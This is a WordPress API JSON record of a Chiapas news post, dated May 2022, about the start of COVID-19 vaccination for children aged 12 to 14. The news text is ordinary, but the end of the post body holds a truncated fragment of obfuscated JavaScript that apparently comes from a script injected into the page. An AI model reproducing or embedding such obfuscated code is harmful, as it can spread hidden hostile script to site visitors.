{"id":2115,"date":"2022-05-13T00:43:10","date_gmt":"2022-05-13T00:43:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2115"},"modified":"2022-05-13T00:43:12","modified_gmt":"2022-05-13T00:43:12","slug":"arranca-campana-de-vacunacion-en-menores-de-edad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2115","title":{"rendered":"Arranca campa\u00f1a de vacunaci\u00f3n en menores de edad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035-1024x683.jpg\" alt=\"\" class=\"wp-image-2116\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220512-WA0035.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. Agencia <\/p>\n\n\n\n<p>ReporteCiudadano, 12 de mayo de 2022. Tuxtla Guti\u00e9rrez.- En Chiapas, este jueves dio inicio la vacunaci\u00f3n anti COVID-19 en menores de 12 a 14 a\u00f1os, inform\u00f3 el delegado del Instituto Mexicano del Seguro Social en la entidad.En breve, las autoridades de la Secretar\u00eda de Educaci\u00f3n, estar\u00e1n brindando las condiciones de vacunaci\u00f3n en las m\u00e1s de 20 mil 500 escuelas, para aplicar la vacuna previa autorizaci\u00f3n de los padres y madres de los menores.Los macrocentros como Ca\u00f1a Hueca culminaron la etapa de vacunaci\u00f3n por m\u00e1s de un a\u00f1o y actualmente la vacuna se aplica en los centros de salud antes se\u00f1alados. Con horarios de 8 de la ma\u00f1ana a 7 de la noche.En 2020, la familia completa de Refugio Concepci\u00f3n, se contagi\u00f3 del virus SARS-CoV2, tuvieron pocos s\u00edntomas y afortunadamente todos sobrevivieron, hoy, acudi\u00f3 por su vacuna en la Cl\u00ednica 25 del IMSS.Los integrantes expresaron que: \u201cNo duele tanto, solo es un piquete, de que me puedo llegar a ba\u00f1ar, pero no me puedo ba\u00f1ar m\u00e1s de 15 minutos no me puedo poner cremas ni nada en mi brazo y que lo deje reposar\u201d.Agregaron que: \u201cMe siento contento porque est\u00e1bamos un poco inquietos en cuanto a qu\u00e9 fecha iba a ser la vacunaci\u00f3n porque ya todos los dem\u00e1s, los m\u00e1s grandes ya est\u00e1n vacunados\u201d.Las autoridades del IMSS invitan a la poblaci\u00f3n para participar en este proceso re inmunizaci\u00f3n ante la pandemia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 12 de mayo de 2022. Tuxtla Guti\u00e9rrez.- En Chiapas, este jueves dio inicio la vacunaci\u00f3n anti COVID-19 en menores de 12 a 14 a\u00f1os, inform\u00f3 el delegado del Instituto Mexicano del Seguro Social en la entidad.En breve, las autoridades de la Secretar\u00eda de Educaci\u00f3n, estar\u00e1n brindando las condiciones de vacunaci\u00f3n en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2115","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2115","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2115"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2115\/revisions"}],"predecessor-version":[{"id":2117,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2115\/revisions\/2117"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2116"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}